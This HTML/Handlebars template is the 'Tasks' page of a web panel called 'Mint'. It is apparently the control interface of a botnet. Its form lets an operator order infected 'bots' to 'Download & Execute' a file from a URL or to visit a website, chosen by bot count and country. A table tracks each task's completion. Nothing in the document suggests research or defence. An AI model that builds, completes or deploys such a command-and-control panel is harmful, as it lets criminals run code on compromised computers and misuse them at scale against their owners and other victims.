<!DOCTYPE html>

<html lang="en">

<head>

    <title>Mint</title>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
    <meta name="description" content="" />
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons+Outlined" rel="stylesheet">
    <link rel="stylesheet" href="/css/global.css">
    <link rel="stylesheet" href="/css/tasks.css">

</head>

<body>
    <div class="dashboard">
        {{> rightmenu}}
        <div class="main">
            <div class="title">
                <h2>Tasks</h2>
            </div>

            <div class="tasks-container">
                <div class="task">
                    <div class="title">
                        <span class="material-icons-outlined">task</span>
                        Tasks
                    </div>
                    {{#if info}}
                    <div class="info">
                        <span class="material-icons-outlined">info</span>
                        {{info}}
                    </div>
                    {{/if}}
                    <form method="post" action="/panel/tasks">
                        <select name="goal" id="goal-select" required>
                            <option value="">Select goal</option>
                            <option value="download_execute">Download & Execute</option>
                            <option value="visit">Visist website</option>
                        </select>
                        <div class="input-group">
                            <input type="text" name="param" id="param" placeholder="URL param" required>
                            <label>Param</label>
                        </div>
                        <div class="input-group">
                            <input type="text" name="targeted" id="targeted" placeholder="Number of bots to target" required>
                            <label>Targeted</label>
                        </div>
                        <div class="input-group">
                            <input type="text" name="countries" id="countries" placeholder="list of countries separated by commas or *." required>
                            <label>Countries</label>
                        </div>
                        <button class="primary">Add Task</button>
                    </form>
                </div>
                <div class="table">
                    <table>
                        <thead>
                            <tr>
                                <td>GOAL</td>
                                <td>PARAM</td>
                                <td>BOTS</td>
                                <td>COMPLETED</td>
                                <td>COUNTRIES</td>
                                <td>DELETE</td>
                            </tr>
                        </thead>
                        <tbody>
                            {{#each tasks}}
                            <tr>
                                <td>{{goal}}</td>
                                <td>{{param}}</td>
                                <td>{{targeted}}</td>
                                <td>{{completed}}</td>
                                <td>{{countries}}</td>
                                <td><a href="/panel/tasks/delete?id={{_id}}" class="delete"><span class="material-icons-outlined delete">delete</span></a></td>
                            </tr>
                            {{/each}}
                        </tbody>
                    </table>
                </div>
            </div>
        </div>
    </div>

</body>

</html>